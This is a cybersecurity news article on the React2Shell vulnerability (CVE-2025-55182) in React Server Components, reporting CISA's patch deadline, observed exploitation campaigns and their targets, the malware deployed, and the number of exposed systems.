The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged federal agencies to apply patches for the React2Shell vulnerability by December 12, 2025, following reports of extensive exploitation.
This critical vulnerability, identified as CVE-2025-55182 (CVSS score: 10.0), impacts the React Server Components (RSC) Flight protocol. The root cause is an unsafe deserialization, enabling an attacker to inject malicious logic for privileged server execution. Other affected frameworks include Next.js, Waku, Vite, React Router, and RedwoodSDK.
Cloudflare’s threat intelligence team, Cloudforce One, stated that “A single, specially crafted HTTP request is sufficient; there is no authentication requirement, user interaction, or elevated permissions involved.” The team added that “Once successful, the attacker can execute arbitrary, privileged JavaScript on the affected server.”
Since its public disclosure on December 3, 2025, this vulnerability has been exploited by numerous threat actors across various campaigns. These attacks involve reconnaissance and the deployment of diverse malware families.
This situation led CISA to include the flaw in its Known Exploited Vulnerabilities catalog last Friday, initially setting a December 26 deadline for federal agencies to apply patches. The deadline was subsequently accelerated to December 12, 2025, highlighting the incident’s critical nature.
Cloud security company Wiz reported observing a “rapid wave of opportunistic exploitation” of the flaw. Most attacks have targeted internet-facing Next.js applications and other containerized workloads within Kubernetes and managed cloud services.
Image Source: Cloudflare
Cloudflare, also monitoring current exploitation activity, indicated that threat actors have used internet-wide scanning and asset discovery platforms to locate exposed systems running React and Next.js applications. Interestingly, some reconnaissance efforts deliberately excluded Chinese IP address spaces.
The web infrastructure company noted that “Their highest-density probing occurred against networks in Taiwan, Xinjiang Uyghur, Vietnam, Japan, and New Zealand – regions frequently associated with geopolitical intelligence collection priorities.”
The activity observed also included more selective targeting of government (.gov) websites, academic research institutions, and critical infrastructure operators. This encompassed a national authority involved in the import and export of uranium, rare metals, and nuclear fuel.
Additional notable findings include:
- Prioritizing high-sensitivity technology targets, such as enterprise password managers and secure vault services, likely to facilitate supply chain attacks.
- Targeting edge-facing SSL VPN appliances whose administrative interfaces may use React-based components.
- Early scanning and exploitation attempts originating from IP addresses previously linked to Asia-affiliated threat clusters.
Kaspersky’s analysis of honeypot data revealed over 35,000 exploitation attempts on December 10, 2025, alone. Attackers initially probed systems with commands like “whoami” before deploying cryptocurrency miners or botnet malware families such as Mirai/Gafgyt variants and RondoDox.
Other identified payloads include Cobalt Strike beacons, Sliver, Fast Reverse Proxy (FRP), the monitoring tool Nezha, a Node.js payload designed to harvest sensitive files and leverage TruffleHog and Gitleaks for secret collection, and a Go-based backdoor offering reverse shell, reconnaissance, and command-and-control (C2) functionalities.
Concurrently, React2Shell has reportedly generated over 140 in-the-wild proof-of-concept exploits of varying quality. VulnCheck noted that approximately half of these are broken, misleading, or otherwise non-functional. The functional exploit repositories include logic to load in-memory web shells such as Godzilla, scan for the flaw, and even deploy a lightweight web application firewall (WAF) to counter malicious payloads.
Security researcher Rakesh Krishnan also uncovered an open directory hosted on “154.61.77[.]105:8082.” This directory contained a proof-of-concept (PoC) exploit script for CVE-2025–55182, alongside two other files:
- “domains.txt,” listing 35,423 domains.
- “next_target.txt,” containing 596 URLs, including prominent companies like Dia Browser, Starbucks, Porsche, and Lululemon.
It is believed that the unidentified threat actor is actively scanning the internet, using targets from the second file to infect hundreds of web pages.
Cybersecurity and cyber insurance company Coalition has compared React2Shell to the 2021 Log4Shell vulnerability (CVE-2021-44228), characterizing it as a “systemic cyber risk aggregation event.”
The Shadowserver Foundation’s latest data indicates over 137,200 internet-exposed IP addresses were running vulnerable code as of December 11, 2025. More than 88,900 instances are in the U.S., followed by Germany (10,900), France (5,500), and India (3,600).
